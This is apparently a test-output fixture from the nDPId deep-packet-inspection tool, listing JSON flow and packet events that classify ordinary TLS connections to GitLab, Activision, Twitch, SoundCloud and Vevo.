-00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482646628,"flow_last_seen":1646482646628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482646628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1646482646628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8eQxAAEAGb\/bAqAGAAhGNgKZUAbv+Ru5OAAAAAKAC+vDfwAAAAgQFtAQCCAp7uQs2AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1646482646646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646646,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8QICEY2AwKgBgAG7plR0ThXR\/kbuT6AS\/oh2XAAAAgQFtAQCCAqpkTIKe7kLNgEDAwc="} -01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1646482646648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482646648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5eQ5AAEAGbffAqAGAAhGNgKZUAbv+Ru5PdE4V0oAYAfbaKAAAAQEICnu5C0qpkTIKFgMBAgABAAH8AwMSh5Kk8yD8gdWVB2YFzzg9KRBCWJ\/pzlApBrokxgf2OCBs84UpHDw4uY4jKpCVZJzZAhJUrEs0AlJ7gTtfJSwiWgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cuYWN0aXZpc2lvbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg40qefHDImQJEkibGm9hnpGwl44lKo4KOQS8qsLRSATsAFwBBBPNBVrG5A+ZLqrow1aQOaEgsW+53RcPAplpAt8ULtljoAJH8CjL7YTSZ+PIOiRhMhirRlex47cXc5PiOAFYE9T0AKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issu
erDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482659915,"flow_last_seen":1646482659915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482659915,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1646482659915,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659915,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NwhAAEAGcJnAqAGAkks+p7QEAbuPD+ThAAAAAKAC+vAn\/AAAAgQFtAQCCAp9leqxAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1646482659944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659944,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrqGSSz6nwKgBgAG7tAQzgGmMjw\/k4qAS\/\/\/dhgAAAgQFTAQCCAr4JbCIfZXqsQEDAwk="} 
-01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1646482659945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482659945,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5NwpAAEAGbprAqAGAkks+p7QEAbuPD+TiM4BpjYAYAfarGwAAAQEICn2V6s\/4JbCIFgMBAgABAAH8AwPVHsjDDxZ0MEuPnh4mVZQrYKtXYBQ9pfekL0WuWf4AwyAvTRXY5\/1xoex7GTddskZx0XzTM0eEKSDE8zjmPz09AAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1ncWwudHdpdGNoLnR2ABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AICTuPjjZ\/cozh9y3b4u57OZ+NqRixmrA1oX4LnqMFUIxABcAQQTtWijAm0UTGHfpz\/ha9z62jseAV4wQoU798kRZvjxGrgocjEiYQtFtFEOacmIDo8c6dP4orndC+2JQqffkv\/gjACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482686914,"flow_last_seen":1646482686914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482686914,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1646482686914,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482686914,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8RWlAAEAGOjfAqAGA0FUonrNwAFCsdkxQAAAAAKAC+vAqmQAAAgQFtAQCCArNau1nAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1646482687080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482687080,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8\/\/dAAPAGz6fQVSiewKgBgABQs3Db1RKprHZMUaASOQif4AAAAgQFtAEDAwAEAggKWgQEFM1q7Wc="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482724450,"flow_last_seen":1646482724450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482724450,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1646482724450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724450,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sa9AAEAG8DvAqAGAEkLEZspeAbv+oP0DAAAAAKAC+vBIlQAAAgQFtAQCCAqQpxNDAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1646482724458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724458,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8e2QAAPYGsIYSQsRmwKgBgAG7yl4LcBoC\/qD9BKAS\/\/+NCwAAAgQFoAQCCAqOOgLQkKcTQwEDAwg="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1646482724464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482724464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5sbFAAEAG7jzAqAGAEkLEZspeAbv+oP0EC3AaA4AYAfbA9QAAAQEICpCnE1COOgLQFgMBAgABAAH8AwM6K+sImNx3dIej3yQBfsHlSQyH5l4F8hLKFYurrt+jPCCUv6qySiadEZg7Gj4\/vX5jrLg\/JYOIeoxWa\/ahTy7RDQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5zb3VuZGNsb3VkLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDq1odYnjLE9YoHd\/igeLWhv14ukLQSyf98ZPyHkQn7OgAXAEEEKYWpJR9uHJSJZBwzi1pAC8cLX9iNXc5VMFPlSgV8HHXqYbwegIwyfo36+y7oUVZIFeBilQuBs9gLF4NzHajtKwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482734324,"flow_last_seen":1646482734324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482734324,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1646482734324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734324,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8YZNAAEAGvz7AqAGAl2XAXNyUAbtdgP2MAAAAAKAC+vB5pwAAAgQFtAQCCArbJaT6AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1646482734331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734331,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJ9KXZcBcwKgBgAG73JRRJl9LXYD9jaAS\/\/87kQAAAgQFTAQCCArq9J312yWk+gEDAwk="} 
-01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1646482734334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482734334,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5YZVAAEAGvT\/AqAGAl2XAXNyUAbtdgP2NUSZfTIAYAfZOkQAAAQEICtslpQXq9J31FgMBAgABAAH8AwNzr2vzd\/QT\/aDhJiSq61v58duBBGwTUq6z8fAzWLEV5CDNfOfaUUVYVfXW\/CDKtRAJ+tVWWsbZK9mMfW2g+Km+ogAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAh2ZXZvLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCPQyH3d70yPXK9aVtEdAPnRA9ZC5WTB071dNPYc9Y+CAAXAEEEeVVr0wfghCvKk8pB3rwr9lMyYYYxB1YwkLSYt9F3bwDqNkUCdiLkyXAxOw3adrfDZNG4HFWPlbGmWIPel1Si6AArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 